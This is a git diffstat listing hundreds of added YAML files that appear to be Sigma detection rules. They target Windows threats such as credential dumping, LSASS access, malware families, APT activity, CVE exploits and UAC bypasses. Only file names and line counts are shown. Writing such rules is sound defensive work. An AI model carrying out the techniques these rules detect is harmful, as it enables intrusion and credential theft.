.../win_system_rare_service_installs.yml | 28 + ...in_taskscheduler_rare_schtask_creation.yml | 28 + .../builtin/win_alert_mimikatz_keywords.yml | 52 + ..._defender_antimalware_platform_expired.yml | 31 + .../win_defender_asr_lsass_access.yml | 49 + .../windefend/win_defender_asr_psexec_wmi.yml | 32 + ...defender_config_change_exclusion_added.yml | 26 + ...der_config_change_exploit_guard_tamper.yml | 39 + ...onfig_change_sample_submission_consent.yml | 33 + .../windefend/win_defender_history_delete.yml | 25 + ...defender_malware_and_pua_scan_disabled.yml | 30 + ..._defender_malware_detected_amsi_source.yml | 26 + ...defender_real_time_protection_disabled.yml | 32 + ...n_defender_real_time_protection_errors.yml | 34 + .../win_defender_restored_quarantine_file.yml | 24 + ...defender_suspicious_features_tampering.yml | 43 + ...win_defender_tamper_protection_trigger.yml | 35 + .../builtin/windefend/win_defender_threat.yml | 28 + .../win_defender_virus_scan_disabled.yml | 30 + .../builtin/wmi/win_wmi_persistence.yml | 40 + ...ate_remote_thread_win_hktl_cactustorch.yml | 39 + ...te_remote_thread_win_hktl_cobaltstrike.yml | 31 + .../create_remote_thread_win_keepass.yml | 29 + .../create_remote_thread_win_loadlibrary.yml | 28 + ..._remote_thread_win_mstsc_susp_location.yml | 34 + ...emote_thread_win_password_dumper_lsass.yml | 31 + ...ate_remote_thread_win_powershell_lsass.yml | 35 + ...ote_thread_win_powershell_susp_targets.yml | 38 + .../create_remote_thread_win_ttdinjec.yml | 27 + ...emote_thread_win_uncommon_source_image.yml | 113 + ...emote_thread_win_uncommon_target_image.yml | 63 + .../create_stream_hash_ads_executable.yml | 31 + ...ate_stream_hash_creation_internet_file.yml | 92 + ...haring_domains_download_susp_extension.yml | 68 + ...ing_domains_download_unusual_extension.yml | 64 + ...eate_stream_hash_hktl_generic_download.yml | 244 + ...eate_stream_hash_regedit_export_to_ads.yml | 30 + .../create_stream_hash_susp_ip_domains.yml | 40 + ...stream_hash_winget_susp_package_source.yml | 39 + .../create_stream_hash_zip_tld_download.yml | 47 + ...e_thread_win_susp_remote_thread_target.yml | 39 + .../driver_load_win_mal_creddumper.yml | 44 + .../driver_load_win_mal_poortry_driver.yml | 75 + ...powershell_script_installed_as_service.yml | 32 + ...oad_win_vuln_avast_anti_rootkit_driver.yml | 39 + .../driver_load_win_vuln_dell_driver.yml | 47 + .../driver_load_win_vuln_drivers_names.yml | 372 ++ .../driver_load_win_vuln_gigabyte_driver.yml | 47 + .../driver_load_win_vuln_hw_driver.yml | 52 + .../driver_load_win_vuln_lenovo_driver.yml | 36 + .../file_event_win_hktl_createminidump.yml | 30 + ...nt_win_lsass_memory_dump_file_creation.yml | 32 + ...ile_event_win_mimikatz_memssp_log_file.yml | 30 + .../file_event_win_susp_clr_logs.yml | 42 + ..._alternate_powershell_hosts_moduleload.yml | 41 + .../image_load_side_load_advapi32.yml | 39 + .../deprecated/image_load_side_load_scm.yml | 38 + .../image_load_side_load_svchost_dlls.yml | 39 + .../image_load_susp_winword_wmidll_load.yml | 39 + .../net_connection_win_binary_github_com.yml | 36 + .../pipe_created_psexec_pipes_artifacts.yml | 36 + ...ccess_win_in_memory_assembly_execution.yml | 124 + ...ess_win_lazagne_cred_dump_lsass_access.yml | 34 + .../proc_access_win_lsass_susp_access.yml | 174 + ...ss_win_pypykatz_cred_dump_lsass_access.yml | 34 + ...proc_creation_win_apt_apt29_thinktanks.yml | 33 + .../proc_creation_win_apt_dragonfly.yml | 31 + .../proc_creation_win_apt_gallium.yml | 37 + .../proc_creation_win_apt_hurricane_panda.yml | 32 + ...reation_win_apt_lazarus_activity_apr21.yml | 36 + .../proc_creation_win_apt_lazarus_loader.yml | 47 + ..._creation_win_apt_muddywater_dnstunnel.yml | 32 + .../proc_creation_win_apt_ta505_dropper.yml | 31 + ...c_creation_win_certutil_susp_execution.yml | 58 + .../proc_creation_win_cmd_read_contents.yml | 37 + ...oc_creation_win_cmd_redirect_to_stream.yml | 32 + ...tial_acquisition_registry_hive_dumping.yml | 36 + .../proc_creation_win_cscript_vbs.yml | 34 + ...ion_mssql_xp_cmdshell_stored_procedure.yml | 35 + .../proc_creation_win_indirect_cmd.yml | 36 + ...in_indirect_command_execution_forfiles.yml | 48 + ...tion_win_invoke_obfuscation_via_rundll.yml | 33 + ...in_invoke_obfuscation_via_use_rundll32.yml | 38 + ...eation_win_lolbas_execution_of_wuauclt.yml | 37 + .../proc_creation_win_lolbin_findstr.yml | 50 + .../proc_creation_win_lolbin_office.yml | 34 + .../proc_creation_win_lolbin_rdrleakdiag.yml | 34 + ...ion_win_lolbins_by_office_applications.yml | 54 + .../deprecated/proc_creation_win_mal_ryuk.yml | 38 + ...on_win_malware_trickbot_recon_activity.yml | 33 + .../proc_creation_win_mavinject_proc_inj.yml | 29 + .../proc_creation_win_msdt_diagcab.yml | 34 + ...proc_creation_win_new_service_creation.yml | 35 + ...tion_win_nslookup_pwsh_download_cradle.yml | 28 + .../proc_creation_win_odbcconf_susp_exec.yml | 43 + ..._from_proxy_executing_regsvr32_payload.yml | 52 + ...from_proxy_executing_regsvr32_payload2.yml | 54 + ...on_win_office_spawning_wmi_commandline.yml | 42 + ...creation_win_possible_applocker_bypass.yml | 43 + ...n_powershell_amsi_bypass_pattern_nov22.yml | 35 + ..._powershell_base64_invoke_susp_cmdlets.yml | 46 + ...n_powershell_base64_listing_shadowcopy.yml | 36 + ...eation_win_powershell_base64_shellcode.yml | 29 + .../proc_creation_win_powershell_bitsjob.yml | 36 + ...on_win_powershell_service_modification.yml | 45 + ...ion_win_powershell_xor_encoded_command.yml | 41 + .../proc_creation_win_reg_dump_sam.yml | 35 + .../proc_creation_win_regsvr32_anomalies.yml | 91 + .../proc_creation_win_renamed_paexec.yml | 44 + .../proc_creation_win_renamed_powershell.yml | 36 + .../proc_creation_win_renamed_psexec.yml | 34 + .../proc_creation_win_renamed_rundll32.yml | 27 + ...reation_win_root_certificate_installed.yml | 38 + .../proc_creation_win_run_from_zip.yml | 27 + ...roc_creation_win_sc_delete_av_services.yml | 124 + .../proc_creation_win_schtasks_user_temp.yml | 35 + .../proc_creation_win_service_stop.yml | 50 + .../proc_creation_win_susp_bitstransfer.yml | 34 + ...eation_win_susp_cmd_exectution_via_wmi.yml | 33 + ...oc_creation_win_susp_commandline_chars.yml | 37 + ...c_creation_win_susp_lolbin_non_c_drive.yml | 46 + .../proc_creation_win_susp_run_folder.yml | 42 + ...proc_creation_win_susp_squirrel_lolbin.yml | 87 + ..._sysinternals_psexec_service_execution.yml | 43 + ...eation_win_sysinternals_psexesvc_start.yml | 26 + .../proc_creation_win_whoami_as_system.yml | 33 + .../proc_creation_win_winword_dll_load.yml | 30 + ..._win_wmic_execution_via_office_process.yml | 42 + .../proc_creation_win_wmic_remote_command.yml | 35 + .../proc_creation_win_wmic_remote_service.yml | 37 + .../proc_creation_win_wuauclt_execution.yml | 39 + ..._creation_syncappvpublishingserver_exe.yml | 27 + ...add_sysinternals_sdelete_registry_keys.yml | 29 + ...istry_event_asep_reg_keys_modification.yml | 212 + ...sing_windows_telemetry_for_persistence.yml | 51 + .../registry_set_add_hidden_user.yml | 29 + ...ble_microsoft_office_security_features.yml | 41 + .../registry_set_office_security.yml | 32 + .../registry_set_silentprocessexit.yml | 29 + ...napi_in_powershell_credentials_dumping.yml | 32 + .../sysmon_dcom_iertutil_dll_hijack.yml | 33 + .../sysmon_mimikatz_detection_lsass.yml | 43 + ...sysmon_powershell_execution_moduleload.yml | 34 + .../deprecated/sysmon_rclone_execution.yml | 51 + .../win_dsquery_domain_trust_discovery.yml | 32 + .../deprecated/win_susp_esentutl_activity.yml | 35 + .../deprecated/win_susp_rclone_exec.yml | 43 + .../win_susp_vssadmin_ntds_activity.yml | 43 + .../dns_query_win_anonymfiles_com.yml | 30 + .../dns_query/dns_query_win_appinstaller.yml | 33 + ...ns_query_win_cloudflared_communication.yml | 31 + ...dns_query_win_devtunnels_communication.yml | 37 + ...in_dns_server_discovery_via_ldap_query.yml | 49 + ...ery_win_hybridconnectionmgr_servicebus.yml | 28 + .../dns_query_win_mal_cobaltstrike.yml | 38 + .../dns_query/dns_query_win_mega_nz.yml | 30 + .../dns_query_win_regsvr32_dns_query.yml | 33 + ...e_access_software_domains_non_browsers.yml | 173 + .../dns_query_win_susp_external_ip_lookup.yml | 102 + ...eamviewer_domain_query_by_uncommon_app.yml | 33 + .../dns_query_win_tor_onion_domain_query.yml | 30 + .../dns_query_win_ufile_io_query.yml | 30 + ..._query_win_vscode_tunnel_communication.yml | 37 + .../driver_load_win_mal_drivers.yml | 817 +++ .../driver_load_win_mal_drivers_names.yml | 97 + .../driver_load_win_pua_process_hacker.yml | 43 + .../driver_load_win_pua_system_informer.yml | 60 + .../driver_load_win_susp_temp_use.yml | 26 + .../driver_load_win_vuln_drivers.yml | 4460 +++++++++++++++++ .../driver_load_win_vuln_drivers_names.yml | 302 ++ .../driver_load_win_vuln_hevd_driver.yml | 35 + .../driver_load_win_vuln_winring0_driver.yml | 37 + .../driver_load/driver_load_win_windivert.yml | 76 + .../Axiom/proc_creation_win_apt_zxshell.yml | 39 + ...eation_win_apt_turla_commands_critical.yml | 37 + ...oc_creation_win_apt_turla_comrat_may20.yml | 38 + ...roc_creation_win_exploit_cve_2015_1641.yml | 31 + ...roc_creation_win_exploit_cve_2017_0261.yml | 33 + ...oc_creation_win_exploit_cve_2017_11882.yml | 35 + ...roc_creation_win_exploit_cve_2017_8759.yml | 34 + .../proc_creation_win_malware_adwind.yml | 35 + .../proc_creation_win_malware_fireball.yml | 35 + ..._access_win_malware_verclsid_shellcode.yml | 38 + .../proc_creation_win_malware_notpetya.yml | 43 + ...n_win_malware_plugx_susp_exe_locations.yml | 102 + .../proc_creation_win_malware_wannacry.yml | 69 + ...oc_creation_win_apt_apt10_cloud_hopper.yml | 34 + .../proc_creation_win_apt_ta17_293a_ps.yml | 32 + ...on_win_apt_lazarus_binary_masquerading.yml | 34 + .../pipe_created_apt_turla_named_pipes.yml | 39 + .../proc_creation_win_malware_elise.yml | 42 + ..._creation_win_apt_apt27_emissary_panda.yml | 36 + .../TA/APT28/proc_creation_win_apt_sofacy.yml | 45 + ...cozy_bear_phishing_campaign_indicators.yml | 35 + ...apt_apt29_phishing_campaign_indicators.yml | 36 + ...c_creation_win_apt_muddywater_activity.yml | 45 + .../proc_creation_win_apt_oilrig_mar18.yml | 57 + .../proc_creation_win_apt_slingshot.yml | 35 + .../proc_creation_win_apt_tropictrooper.yml | 26 + ...roc_creation_win_exploit_other_bearlpe.yml | 36 + ...roc_creation_win_exploit_cve_2019_1378.yml | 44 + ...roc_creation_win_exploit_cve_2019_1388.yml | 38 + .../proc_creation_win_malware_babyshark.yml | 39 + .../proc_creation_win_malware_dridex.yml | 56 + .../proc_creation_win_malware_dtrack.yml | 45 + .../proc_creation_win_malware_emotet.yml | 52 + .../proc_creation_win_malware_formbook.yml | 58 + ...tion_win_malware_lockergoga_ransomware.yml | 30 + .../QBot/proc_creation_win_malware_qbot.yml | 40 + .../Ryuk/proc_creation_win_malware_ryuk.yml | 57 + ...creation_win_malware_snatch_ransomware.yml | 34 + ...c_creation_win_apt_aptc12_bluemushroom.yml | 32 + ...creation_win_apt_apt31_judgement_panda.yml | 43 + ...c_creation_win_apt_bear_activity_gtr19.yml | 36 + .../proc_creation_win_apt_empiremonkey.yml | 31 + ...ation_win_apt_equationgroup_dll_u_load.yml | 33 + .../proc_creation_win_apt_mustangpanda.yml | 41 + .../proc_creation_win_apt_wocao.yml | 49 + ...oc_creation_win_exploit_cve_2020_10189.yml | 44 + ...roc_creation_win_exploit_cve_2020_1048.yml | 37 + ...roc_creation_win_exploit_cve_2020_1350.yml | 38 + ..._creation_win_malware_blue_mockingbird.yml | 38 + ..._win_malware_emotet_rundll32_execution.yml | 42 + ...creation_win_malware_ke3chang_tidepool.yml | 38 + ...c_creation_win_malware_maze_ransomware.yml | 48 + ...c_creation_win_malware_trickbot_wermgr.yml | 34 + .../proc_creation_win_apt_evilnum_jul20.yml | 34 + .../proc_creation_win_apt_gallium_iocs.yml | 111 + .../proc_creation_win_apt_greenbug_may20.yml | 57 + ...reation_win_apt_lazarus_group_activity.yml | 65 + .../proc_creation_win_apt_unc2452_cmds.yml | 61 + .../proc_creation_win_apt_unc2452_ps.yml | 38 + ...ation_win_apt_unc2452_vbscript_pattern.yml | 35 + .../proc_creation_win_apt_taidoor.yml | 34 + ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 43 + .../proc_creation_win_apt_winnti_pipemon.yml | 35 + ...e_event_win_cve_2021_1675_printspooler.yml | 36 + ...it_cve_2021_26084_atlassian_confluence.yml | 47 + ..._win_exploit_cve_2021_26857_msexchange.yml | 33 + ...le_event_win_cve_2021_26858_msexchange.yml | 42 + ...ation_win_exploit_cve_2021_35211_servu.yml | 36 + .../file_event_win_exploit_cve_2021_40444.yml | 40 + ...oc_creation_win_exploit_cve_2021_40444.yml | 39 + ..._2021_40444_office_directory_traversal.yml | 42 + .../file_event_win_cve_2021_41379_msi_lpe.yml | 35 + ...oc_creation_win_exploit_cve_2021_41379.yml | 42 + ...t_win_cve_2021_44077_poc_default_files.yml | 28 + ...n_win_exploit_other_razorinstaller_lpe.yml | 32 + ...tion_win_exploit_other_systemnightmare.yml | 31 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 43 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 39 + ...ation_win_malware_blackbyte_ransomware.yml | 40 + .../Conti/proc_creation_win_malware_conti.yml | 34 + .../proc_creation_win_malware_conti_7zip.yml | 31 + ..._win_malware_conti_ransomware_commands.yml | 36 + ...malware_conti_ransomware_database_dump.yml | 40 + ...eation_win_malware_darkside_ransomware.yml | 35 + ...ent_win_malware_devil_bait_script_drop.yml | 36 + ...win_malware_devil_bait_output_redirect.yml | 44 + .../image_load_malware_foggyweb_nobelium.yml | 28 + ...alware_goofy_guineapig_file_indicators.yml | 31 + ...win_malware_goofy_guineapig_broken_cmd.yml | 26 + ...g_googleupdate_uncommon_child_instance.yml | 32 + .../file_event_win_moriya_rootkit.yml | 32 + ...le_event_win_malware_pingback_backdoor.yml | 35 + .../image_load_malware_pingback_backdoor.yml | 35 + ...creation_win_malware_pingback_backdoor.yml | 39 + ...t_win_malware_small_sieve_evasion_typo.yml | 36 + ...eation_win_malware_small_sieve_cli_arg.yml | 27 + ...y_set_malware_small_sieve_evasion_typo.yml | 30 + .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 82 + .../proc_creation_win_apt_revil_kaseya.yml | 51 + .../image_load_usp_svchost_clfsw32.yml | 30 + .../proc_creation_win_apt_sourgrum.yml | 45 + ...win_exploit_cve_2023_21554_queuejumper.yml | 40 + .../file_event_win_cve_2022_24527_lpe.yml | 32 + ...2022_26809_rpcss_child_process_anomaly.yml | 36 + ...eation_win_exploit_cve_2022_29072_7zip.yml | 42 + ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 45 + ...te_remote_thread_win_malware_bumblebee.yml | 33 + ...on_win_malware_hermetic_wiper_activity.yml | 37 + ...raspberry_robin_single_dot_ending_file.yml | 30 + ..._creation_win_apt_actinium_persistence.yml | 33 + .../MERCURY/proc_creation_win_apt_mercury.yml | 31 + ...023_22518_confluence_tomcat_child_proc.yml | 48 + ...ve_2023_23397_outlook_reminder_trigger.yml | 34 + ...ile_event_win_cve_2023_27363_foxit_rce.yml | 32 + ...exploit_cve_2023_34362_moveit_transfer.yml | 69 + ...exploit_cve_2023_36874_report_creation.yml | 37 + ...exploit_cve_2023_36874_wermgr_creation.yml | 38 + ...win_exploit_cve_2023_36874_fake_wermgr.yml | 32 + ..._office_windows_html_rce_file_patterns.yml | 32 + ..._cve_2023_38331_winrar_susp_double_ext.yml | 33 + ...ploit_cve_2023_38831_winrar_child_proc.yml | 47 + ...t_cve_2023_40477_winrar_rev_file_abuse.yml | 32 + ...loit_other_win_server_undocumented_rce.yml | 36 + ...vent_win_malware_coldsteel_renamed_cmd.yml | 27 + ...malware_coldsteel_service_dll_creation.yml | 28 + ...ware_coldsteel_persistence_service_dll.yml | 29 + ...in_malware_coldsteel_anonymous_process.yml | 30 + ...creation_win_malware_coldsteel_cleanup.yml | 36 + ..._malware_coldsteel_service_persistence.yml | 31 + ...ry_set_malware_coldsteel_created_users.yml | 32 + ...lware_darkgate_autoit3_binary_creation.yml | 41 + ..._autoit3_from_susp_parent_and_location.yml | 42 + ...win_malware_darkgate_net_user_creation.yml | 36 + ..._creation_win_malware_griffon_patterns.yml | 29 + ...ware_icedid_rundll32_dllregisterserver.yml | 31 + ..._win_malware_pikabot_rundll32_activity.yml | 38 + ...re_pikabot_combined_commands_execution.yml | 49 + ...win_malware_pikabot_rundll32_discovery.yml | 37 + ...win_malware_pikabot_rundll32_hollowing.yml | 38 + ...n_malware_qakbot_regsvr32_calc_pattern.yml | 31 + ..._win_malware_qakbot_rundll32_execution.yml | 44 + ...on_win_malware_qakbot_rundll32_exports.yml | 72 + ...are_qakbot_rundll32_fake_dll_execution.yml | 44 + ...win_malware_qakbot_uninstaller_cleanup.yml | 35 + ...alware_rhadamanthys_stealer_dll_launch.yml | 36 + ..._malware_rorschach_ransomware_activity.yml | 37 + ...in_malware_snake_encrypted_payload_ioc.yml | 26 + ...event_win_malware_snake_installers_ioc.yml | 28 + ...nt_win_malware_snake_werfault_creation.yml | 33 + ...n_win_malware_snake_installer_cli_args.yml | 30 + ...ation_win_malware_snake_installer_exec.yml | 38 + ...on_win_malware_snake_service_execution.yml | 28 + ...y_event_malware_snake_covert_store_key.yml | 27 + ...gistry_set_malware_snake_encrypted_key.yml | 30 + ...win_malware_socgholish_second_stage_c2.yml | 30 + .../dns_query_win_malware_3cx_compromise.yml | 64 + ...e_load_malware_3cx_compromise_susp_dll.yml | 73 + ...ware_3cx_compromise_beaconing_activity.yml | 64 + ...n_win_malware_3cx_compromise_execution.yml | 105 + ...n_malware_3cx_compromise_susp_children.yml | 53 + ...win_malware_3cx_compromise_susp_update.yml | 48 + ...ad_apt_cozy_bear_graphical_proton_dlls.yml | 39 + ...query_win_apt_diamond_steel_indicators.yml | 30 + ...event_win_apt_diamond_sleet_indicators.yml | 33 + ...image_load_apt_diamond_sleet_side_load.yml | 31 + ...ation_win_apt_diamond_sleet_indicators.yml | 26 + ...event_apt_diamond_sleet_scheduled_task.yml | 33 + ...7_powershell_scripts_naming_convention.yml | 28 + ...n_apt_fin7_powertrash_lateral_movement.yml | 35 + ..._event_win_apt_lace_tempest_indicators.yml | 30 + ...pt_lace_tempest_cobalt_strike_download.yml | 28 + ..._win_apt_lace_tempest_loader_execution.yml | 28 + ...ge_load_apt_lazarus_side_load_activity.yml | 41 + ...storm_aspera_faspex_susp_child_process.yml | 121 + ...int_sandstorm_log4j_wstomcat_execution.yml | 29 + ...storm_manage_engine_susp_child_process.yml | 128 + ...ation_win_apt_mustang_panda_indicators.yml | 35 + ...le_event_win_apt_onyx_sleet_indicators.yml | 26 + ...int_management_exploitation_indicators.yml | 40 + ...t_print_management_exploitation_pc_app.yml | 46 + ...ion_win_apt_peach_sandstorm_indicators.yml | 27 + .../file_change_win_2022_timestomping.yml | 48 + ...ge_win_unusual_modification_by_dns_exe.yml | 31 + ...lete_win_cve_2021_1675_print_nightmare.yml | 34 + .../file_delete_win_delete_backup_file.yml | 44 + ...file_delete_win_delete_event_log_files.yml | 29 + ...te_win_delete_exchange_powershell_logs.yml | 30 + ...file_delete_win_delete_iis_access_logs.yml | 31 + ..._win_delete_powershell_command_history.yml | 28 + .../file_delete_win_delete_prefetch.yml | 33 + ...file_delete_win_delete_teamviewer_logs.yml | 32 + .../file_delete_win_delete_tomcat_logs.yml | 36 + ...win_sysinternals_sdelete_file_deletion.yml | 34 + ...delete_win_unusual_deletion_by_dns_exe.yml | 34 + ...elete_win_zone_identifier_ads_uncommon.yml | 42 + .../file_event_win_access_susp_teams.yml | 31 + ...ile_event_win_access_susp_unattend_xml.yml | 29 + ...n_adsi_cache_creation_by_uncommon_tool.yml | 55 + .../file_event_win_advanced_ip_scanner.yml | 34 + .../file_event_win_anydesk_artefact.yml | 32 + ...vent_win_anydesk_writing_susp_binaries.yml | 34 + .../file_event_win_aspnet_temp_files.yml | 37 + .../file_event_win_bloodhound_collection.yml | 45 + .../file_event_win_crackmapexec_patterns.yml | 63 + ...t_win_create_evtx_non_common_locations.yml | 37 + ...ile_event_win_create_non_existent_dlls.yml | 47 + ...e_event_win_creation_new_shim_database.yml | 34 + ...ile_event_win_creation_scr_binary_file.yml | 37 + .../file_event_win_creation_system_file.yml | 138 + ...ent_win_creation_unquoted_service_path.yml | 29 + ...vent_win_cred_dump_tools_dropped_files.yml | 57 + ...file_event_win_cscript_wscript_dropper.yml | 45 + .../file_event_win_csexec_service.yml | 27 + ...file_event_win_csharp_compile_artefact.yml | 30 + ...ile_event_win_dcom_iertutil_dll_hijack.yml | 34 + ...e_event_win_dll_sideloading_space_path.yml | 35 + ...file_event_win_dump_file_susp_creation.yml | 38 + ...ile_event_win_errorhandler_persistence.yml | 29 + .../file_event_win_exchange_webshell_drop.yml | 40 + ..._win_exchange_webshell_drop_suspicious.yml | 44 + .../file_event_win_gotoopener_artefact.yml | 29 + .../file_event_win_hktl_dumpert.yml | 31 + ...nt_win_hktl_hivenightmare_file_exports.yml | 38 + .../file_event_win_hktl_inveigh_artefacts.yml | 39 + .../file_event_win_hktl_mimikatz_files.yml | 33 + .../file_event/file_event_win_hktl_nppspy.yml | 29 + ...le_event_win_hktl_powerup_dllhijacking.yml | 35 + .../file_event_win_hktl_quarkspw_filedump.yml | 29 + .../file_event_win_hktl_remote_cred_dump.yml | 30 + .../file_event_win_hktl_safetykatz.yml | 28 + ...tial_access_dll_search_order_hijacking.yml | 64 + ...e_event_win_install_teamviewer_desktop.yml | 26 + ...ile_event_win_iphlpapi_dll_sideloading.yml | 32 + .../file_event_win_iso_file_mount.yml | 38 + .../file_event_win_iso_file_recent.yml | 36 + ...lbin_gather_network_info_script_output.yml | 36 + ...vent_win_lsass_default_dump_file_names.yml | 59 + .../file_event_win_lsass_shtinkering.yml | 29 + .../file_event_win_lsass_werfault_dump.yml | 29 + .../file_event/file_event_win_mal_adwind.yml | 35 + .../file_event_win_mal_octopus_scanner.yml | 29 + .../file_event_win_msdt_susp_directories.yml | 35 + .../file_event_win_net_cli_artefact.yml | 53 + ...n_new_files_in_uncommon_appdata_folder.yml | 50 + .../file_event_win_new_scr_file.yml | 34 + ...vent_win_notepad_plus_plus_persistence.yml | 37 + .../file_event_win_ntds_dit_creation.yml | 26 + ...t_win_ntds_dit_uncommon_parent_process.yml | 54 + ...le_event_win_ntds_dit_uncommon_process.yml | 51 + .../file_event_win_ntds_exfil_tools.yml | 31 + ...ile_event_win_office_addin_persistence.yml | 42 + ...e_event_win_office_macro_files_created.yml | 36 + ...vent_win_office_macro_files_downloaded.yml | 65 + ...n_office_macro_files_from_susp_process.yml | 49 + ...office_onenote_files_in_susp_locations.yml | 38 + ..._win_office_onenote_susp_dropped_files.yml | 52 + ...vent_win_office_outlook_macro_creation.yml | 34 + .../file_event_win_office_outlook_newform.yml | 33 + ...win_office_outlook_susp_macro_creation.yml | 36 + ...fice_publisher_files_in_susp_locations.yml | 30 + ...e_event_win_office_startup_persistence.yml | 58 + ...e_event_win_office_susp_file_extension.yml | 68 + ...event_win_office_uncommon_file_startup.yml | 70 + .../file_event_win_pcre_net_temp_file.yml | 28 + .../file_event_win_perflogs_susp_files.yml | 44 + ...t_win_powershell_drop_binary_or_script.yml | 56 + ...e_event_win_powershell_drop_powershell.yml | 35 + ...e_event_win_powershell_exploit_scripts.yml | 279 ++ ...e_event_win_powershell_module_creation.yml | 31 + ...nt_win_powershell_module_susp_creation.yml | 29 + ...in_powershell_module_uncommon_creation.yml | 39 + ...event_win_powershell_startup_shortcuts.yml | 36 + ...licy_test_creation_by_uncommon_process.yml | 39 + .../file_event_win_rclone_config_files.yml | 29 + .../file_event_win_rdp_file_susp_creation.yml | 49 + ...e_event_win_redmimicry_winnti_filedrop.yml | 30 + .../file_event_win_remcom_service.yml | 27 + ...te_access_tools_screenconnect_artefact.yml | 29 + ...access_tools_screenconnect_remote_file.yml | 32 + .../file_event_win_ripzip_attack.yml | 33 + .../file_event/file_event_win_sam_dump.yml | 51 + ...e_event_win_shell_write_susp_directory.yml | 51 + ..._win_shell_write_susp_files_extensions.yml | 59 + ...le_event_win_startup_folder_file_write.yml | 34 + .../file_event_win_susp_colorcpl.yml | 33 + ...ile_event_win_susp_creation_by_mobsync.yml | 33 + ...e_event_win_susp_default_gpo_dir_write.yml | 29 + .../file_event_win_susp_desktop_ini.yml | 38 + .../file_event_win_susp_desktop_txt.yml | 30 + ..._event_win_susp_desktopimgdownldr_file.yml | 39 + .../file_event_win_susp_diagcab.yml | 25 + .../file_event_win_susp_double_extension.yml | 59 + ...ile_event_win_susp_exchange_aspx_write.yml | 31 + ...ile_event_win_susp_executable_creation.yml | 35 + .../file_event_win_susp_get_variable.yml | 32 + ...t_win_susp_hidden_dir_index_allocation.yml | 35 + ...file_event_win_susp_homoglyph_filename.yml | 82 + ...n_susp_legitimate_app_dropping_archive.yml | 57 + ...t_win_susp_legitimate_app_dropping_exe.yml | 49 + ...in_susp_legitimate_app_dropping_script.yml | 52 + ...le_event_win_susp_lnk_double_extension.yml | 62 + .../file_event_win_susp_pfx_file_creation.yml | 32 + ...file_event_win_susp_powershell_profile.yml | 35 + ...cexplorer_driver_created_in_tmp_folder.yml | 36 + ...e_event_win_susp_recycle_bin_fake_exec.yml | 38 + ...vent_win_susp_spool_drivers_color_drop.yml | 29 + ...nt_win_susp_startup_folder_persistence.yml | 42 + ...win_susp_system_interactive_powershell.yml | 30 + .../file_event_win_susp_task_write.yml | 32 + ...ent_win_susp_teamviewer_remote_session.yml | 32 + ...ent_win_susp_vscode_powershell_profile.yml | 31 + ...vent_win_susp_windows_terminal_profile.yml | 35 + ..._event_win_susp_winsxs_binary_creation.yml | 34 + ..._sysinternals_livekd_default_dump_name.yml | 26 + ...e_event_win_sysinternals_livekd_driver.yml | 29 + ...sinternals_livekd_driver_susp_creation.yml | 33 + ...internals_procexp_driver_susp_creation.yml | 37 + ...internals_procmon_driver_susp_creation.yml | 32 + ..._event_win_sysinternals_psexec_service.yml | 32 + ...nt_win_sysinternals_psexec_service_key.yml | 35 + ...em32_local_folder_privilege_escalation.yml | 35 + .../file_event_win_taskmgr_lsass_dump.yml | 32 + ...e_event_win_tsclient_filewrite_startup.yml | 26 + ..._event_win_uac_bypass_consent_comctl32.yml | 29 + ...e_event_win_uac_bypass_dotnet_profiler.yml | 29 + .../file_event_win_uac_bypass_eventvwr.yml | 36 + ...ent_win_uac_bypass_idiagnostic_profile.yml | 30 + .../file_event_win_uac_bypass_ieinstal.yml | 31 + ...file_event_win_uac_bypass_msconfig_gui.yml | 29 + ...vent_win_uac_bypass_ntfs_reparse_point.yml | 29 + .../file_event_win_uac_bypass_winsat.yml | 31 + .../file_event_win_uac_bypass_wmp.yml | 32 + ...le_event_win_vhd_download_via_browsers.yml | 46 + ...scode_tunnel_remote_creation_artefacts.yml | 28 + ...nt_win_vscode_tunnel_renamed_execution.yml | 32 + ...ile_event_win_webshell_creation_detect.yml | 56 + .../file_event_win_werfault_dll_hijacking.yml | 34 + .../file_event_win_winrm_awl_bypass.yml | 36 + ...ersistence_script_event_consumer_write.yml | 27 + ...ile_event_win_wmiexec_default_filename.yml | 30 + ...event_win_wmiprvse_wbemcomn_dll_hijack.yml | 30 + .../file_event_win_wpbbin_persistence.yml | 28 + ...le_event_win_writing_local_admin_share.yml | 31 + ...load_cmstp_load_dll_from_susp_location.yml | 37 + ...image_load_dll_amsi_suspicious_process.yml | 33 + ...rosoft_account_token_provider_dll_load.yml | 62 + ...msvcs_load_renamed_version_by_rundll32.yml | 37 + ..._load_dll_credui_uncommon_process_load.yml | 60 + ...age_load_dll_dbghelp_dbgcore_susp_load.yml | 64 + ...load_dll_dbghelp_dbgcore_unsigned_load.yml | 38 + .../image_load_dll_pcre_dotnet_dll_load.yml | 28 + ...mage_load_dll_rstrtmgr_suspicious_load.yml | 54 + .../image_load_dll_rstrtmgr_uncommon_load.yml | 61 + .../image_load_dll_sdiageng_load_by_msdt.yml | 29 + ...system_management_automation_susp_load.yml | 85 + .../image_load_dll_tttracer_module_load.yml | 34 + .../image_load_dll_vss_ps_susp_load.yml | 64 + .../image_load_dll_vssapi_susp_load.yml | 55 + .../image_load_dll_vsstrace_susp_load.yml | 47 + .../image_load_hktl_sharpevtmute.yml | 31 + .../image_load_hktl_silenttrinity_stager.yml | 30 + ...load_iexplore_dcom_iertutil_dll_hijack.yml | 34 + .../image_load_lsass_unsigned_image_load.yml | 28 + ...e_load_office_dotnet_assembly_dll_load.yml | 35 + .../image_load_office_dotnet_clr_dll_load.yml | 35 + .../image_load_office_dotnet_gac_dll_load.yml | 35 + .../image_load_office_dsparse_dll_load.yml | 35 + .../image_load_office_excel_xll_susp_load.yml | 39 + .../image_load_office_kerberos_dll_load.yml | 35 + ...image_load_office_outlook_outlvba_load.yml | 27 + .../image_load_office_powershell_dll_load.yml | 35 + .../image_load_office_vbadll_load.yml | 38 + .../image_load_rundll32_remote_share_load.yml | 28 + ...e_load_scrcons_wmi_scripteventconsumer.yml | 37 + .../image_load/image_load_side_load_7za.yml | 36 + ..._load_side_load_abused_dlls_susp_paths.yml | 52 + .../image_load_side_load_antivirus.yml | 89 + .../image_load_side_load_appverifui.yml | 36 + ...aruba_networks_virtual_intranet_access.yml | 50 + .../image_load_side_load_avkkid.yml | 36 + .../image_load_side_load_ccleaner_du.yml | 36 + ...ge_load_side_load_ccleaner_reactivator.yml | 34 + 